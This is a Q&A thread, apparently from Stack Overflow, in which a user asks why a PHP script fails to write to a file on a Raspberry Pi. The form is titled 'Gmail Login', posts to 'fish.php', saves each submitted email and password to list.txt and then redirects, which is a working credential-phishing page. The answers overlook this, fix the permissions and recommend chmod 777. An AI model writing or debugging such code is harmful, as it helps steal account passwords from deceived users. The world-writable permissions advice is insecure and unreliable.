# Writing to file but it's not working on my Pi?

Tags: php, linux

I am attempting to write to a text file using PHP.

I have this form

```
<form action="fish.php" method="POST">
<p>Gmail Login</p> <input name="gmail1" type="text" />
</br>
<p>Password</p> <input name="gmail2" type="password" />
</br>
<input type="submit" name="submit" value="Submit">
</form>
```

I also have this PHP file

```
<?php
if(isset($_POST['gmail1']) && isset($_POST['gmail2'])) {
$data = $_POST['gmail1'] . '-' . $_POST['gmail2'] . "\n";
$ret = file_put_contents('list.txt', $data, FILE_APPEND | LOCK_EX);
if($ret === false) {
    die('There was an error writing this file');
}
else {
    header("Location: index.html");
}
}
else {
   die('no post data to process');
}
```

Now I have used this on a web hosting and it works perfectly fine. I then put it onto my raspberry Pi running linux with Apache, PHP and all that's required installed on it but I just keep getting 'There was an error writing this file' rather than being redirected to my homepage like I should.

I've got all the same files and whatnot, could anybody guess what's wrong?

Thanks!

Comment: I'd guess you haven't set the permissions properly on your Pi

Comment: most likely it's folder permissions on the folder where you're trying to write the file.  If you're not concerned for security on this environment, you could do `chmod 777 /path/to/folder`

Comment: Definitely a file (and/or folder) permissions issue. Plus, I suggest you add `if(isset($_POST['submit'])){` on top of `if(isset($_POST['gmail1']) && isset($_POST['gmail2'])) {` and close it off with a closing `}` after your last brace.

Comment: Yeah changing the permissions worked fine! Thanks so much guys!

Comment: @user2882612 Great news and you're welcome. Glad it worked out. However, have a look at what I put in, it could serve you down the road, if you want to ***"chmod on the fly."***

Answer (score 1):

This is a permission error. If your text file is located on your Pi, you just have to right click on it, and select 'properties'. Then, go to the 'permissions' tap, and make the file read- and writable for everyone.
That worked on my Pi :)

Answer (score 0):

This may very well be a file permissions issue.

You can try opening the file first ([`fread`](http://php.net/manual/en/function.fread.php)), setting/[`chmod`](http://php.net/manual/en/function.chmod.php)'ing it to `0777` then write the content to it after.

This has been tested and working on my server.

You may also want to change permissions from `0777` to `0644`

And I added an `if(isset($_POST['submit']))` condition to avoid premature writing to file.

```
<?php

if(isset($_POST['submit'])){
if(isset($_POST['gmail1']) && isset($_POST['gmail2'])) {
$data = $_POST['gmail1'] . '-' . $_POST['gmail2'] . "\n";

$file = "list.txt";
fopen($file, "r");
chmod ($file, 0777); // change to 0644 if required
$ret = file_put_contents($file, $data, FILE_APPEND | LOCK_EX);

if($ret === false) {
    die('There was an error writing this file');
}
else {
    header("Location: index.html");

}
}
else {
   die('no post data to process');
}

} // for if(isset($_POST['submit']))

?>
```